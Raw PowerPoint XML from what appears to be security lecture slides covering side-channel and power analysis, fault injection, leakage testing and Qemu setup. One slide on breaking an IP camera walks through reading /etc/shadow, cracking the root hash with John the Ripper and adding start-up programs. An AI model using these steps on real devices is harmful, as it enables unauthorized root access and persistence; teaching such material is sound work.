            <a:ext cx="11122429" cy="4508077"/>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PX4?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.px4.io/en/frames_multicopter/matrice100.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24388143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785" y="136524"/>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Side channels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399010" y="1426579"/>
            <a:ext cx="11122429" cy="4508077"/>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Information leaks from unintended physical channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Timing differences in public key systems can reveal keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Circuits operating at high frequency “broadcast”.  (Simple and Differential Electromagnetic Analysis --- SEMA, DEMA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Power usage can disclose information (Simple Power Analysis and Differential Power Analysis --- SPA, DPA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>First discovered publicly by Pau Kocher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Famous example is using “electric power meters” to disclose patterns of life</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Fault injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Audio (microphone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>near a typewriter or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>rotor machine)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Side channel attacks usually require some physical access (not necessarily direct access)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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174</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32072001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785" y="136524"/>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Discovering side channels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010" y="1426579"/>
                <a:ext cx="11122429" cy="4508077"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>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Welch t-test</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="457200" indent="-4572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𝑡</m:t>
                    </m:r>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bar>
                          <m:barPr>
                            <m:pos m:val="top"/>
                            <m:ctrlPr>
                              <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                              </a:rPr>
                            </m:ctrlPr>
                          </m:bar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𝑋</m:t>
                                </m:r>
                              </m:e>
                              <m:sub>
                                <m:r>
                                  <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                    <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                  </a:rPr>
                                  <m:t>1</m:t>
                                </m:r>
                              </m:sub>
                            </m:sSub>
                          </m:e>
                        </m:bar>
                        <m:r>
                          <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          </a:rPr>
                          <m:t>−</m:t>
                        </m:r>
                        <m:bar>
                          <m:barPr>
                            <m:pos m:val="top"/>
                            <m:ctrlPr>
                              <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                              </a:rPr>
                            </m:ctrlPr>
                          </m:bar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𝑋</m:t>
                                </m:r>
                              </m:e>
                              <m:sub>
                                <m:r>
                                  <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                    <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                  </a:rPr>
                                  <m:t>2</m:t>
                                </m:r>
                              </m:sub>
                            </m:sSub>
                          </m:e>
                        </m:bar>
                      </m:num>
                      <m:den>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1</m:t>
                                        </m:r>
                                      </m:sub>
                                    </m:sSub>
                                  </m:e>
                                  <m:sup>
                                    <m:r>
                                      <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                      </a:rPr>
                                      <m:t>2</m:t>
                                    </m:r>
                                  </m:sup>
                                </m:sSup>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1</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2</m:t>
                                        </m:r>
                                      </m:sub>
                                    </m:sSub>
                                  </m:e>
                                  <m:sup>
                                    <m:r>
                                      <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                      </a:rPr>
                                      <m:t>2</m:t>
                                    </m:r>
                                  </m:sup>
                                </m:sSup>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2</m:t>
                                    </m:r>
                                  </m:sub>
                                </m:sSub>
                              </m:den>
                            </m:f>
                          </m:e>
                        </m:rad>
                      </m:den>
                    </m:f>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Arial"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010" y="1426579"/>
                <a:ext cx="11122429" cy="4508077"/>
              </a:xfrm>
              <a:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-342" t="-11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175</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28125905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785" y="136524"/>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Fault injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399010" y="1426579"/>
            <a:ext cx="11122429" cy="4508077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Heat</a:t>
            </a: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Light including lasers</a:t>
            </a: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Electrical signal (Voltage glitching)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">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Bit flips</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">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Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">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Charge leakage (e.g.-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rowhammer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">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Latch up</a:t>
            </a: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Modify electrical characteristic (capacitance, resistance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Xray</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Mechanical stress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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176</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9305858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785" y="136524"/>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DPA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399010" y="1426579"/>
            <a:ext cx="11122429" cy="4508077"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Connect to device</a:t>
            </a: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Record power traces</a:t>
            </a:r>
          </a:p>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signal processing techniques to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>remove noise and errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28759491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785" y="136524"/>
            <a:ext cx="10850880" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discovering side channels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010" y="1426579"/>
                <a:ext cx="11122429" cy="4508077"/>
              </a:xfrm>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="457200" indent="-4572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Welch t-test</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="457200" indent="-4572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𝑡</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        <a:ea typeface="Arial"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bar>
                          <m:barPr>
                            <m:pos m:val="top"/>
                            <m:ctrlPr>
                              <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                              </a:rPr>
                            </m:ctrlPr>
                          </m:bar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𝑋</m:t>
                                </m:r>
                              </m:e>
                              <m:sub>
                                <m:r>
                                  <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                    <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                  </a:rPr>
                                  <m:t>1</m:t>
                                </m:r>
                              </m:sub>
                            </m:sSub>
                          </m:e>
                        </m:bar>
                        <m:r>
                          <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                            <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          </a:rPr>
                          <m:t>−</m:t>
                        </m:r>
                        <m:bar>
                          <m:barPr>
                            <m:pos m:val="top"/>
                            <m:ctrlPr>
                              <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                              </a:rPr>
                            </m:ctrlPr>
                          </m:bar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𝑋</m:t>
                                </m:r>
                              </m:e>
                              <m:sub>
                                <m:r>
                                  <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                    <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                    <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                  </a:rPr>
                                  <m:t>2</m:t>
                                </m:r>
                              </m:sub>
                            </m:sSub>
                          </m:e>
                        </m:bar>
                      </m:num>
                      <m:den>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1</m:t>
                                        </m:r>
                                      </m:sub>
                                    </m:sSub>
                                  </m:e>
                                  <m:sup>
                                    <m:r>
                                      <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                      </a:rPr>
                                      <m:t>2</m:t>
                                    </m:r>
                                  </m:sup>
                                </m:sSup>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1</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2</m:t>
                                        </m:r>
                                      </m:sub>
                                    </m:sSub>
                                  </m:e>
                                  <m:sup>
                                    <m:r>
                                      <a:rPr lang="en-US" sz="2000" b="0" i="1" smtClean="0">
                                        <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                                      </a:rPr>
                                      <m:t>2</m:t>
                                    </m:r>
                                  </m:sup>
                                </m:sSup>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2</m:t>
                                    </m:r>
                                  </m:sub>
                                </m:sSub>
                              </m:den>
                            </m:f>
                          </m:e>
                        </m:rad>
                      </m:den>
                    </m:f>
                  </m:oMath>
                </a14:m>
                <a:endParaRPr lang="en-US" sz="2000" dirty="0">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Arial"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010" y="1426579"/>
                <a:ext cx="11122429" cy="4508077"/>
              </a:xfrm>
              <a:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-342" t="-11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6FDE6E-7B7E-6840-BB48-02728C98186F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2789222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Breaking an IP Camera – details, 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540325" y="2036616"/>
            <a:ext cx="11344100" cy="4430575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Poke around.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cat the password file: cat /etc/shadow.  See any accounts with no password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Get the (encrypted) root password from  /etc/shadow and submit it to the password cracker John the Ripper.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Once you have the root password, you can log in on any boot as root through the screen console.  Printenv will print out the current environment variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now that you’re root, you can change configuration information, binaries or even add programs that run at start-up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>If you add programs, you either have to ftp them over or use a busybox command to transfer files after you ascii–encode them.</a:t>
            </a:r>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B3ECD31A-F385-854D-9309-011005C88C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357360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Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> user binaries</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608073" y="1627142"/>
            <a:ext cx="11245260" cy="49399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rial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Installation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sudo apt-get install qemu</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sudo apt-get install qemu-user-static</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sudo apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>binfmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-support</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dpkg --add-architecture armhf</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update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libc6:armhf</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dpkg-cross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wget http://www.emdebian.org/debian/pool/main/g/glibc/libc6-armel-cross_2.7-18lenny6_all.deb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dpkg -i libc6-armel-cross_2.7-18lenny6_all.deb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>For more on Qemu user emulation, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
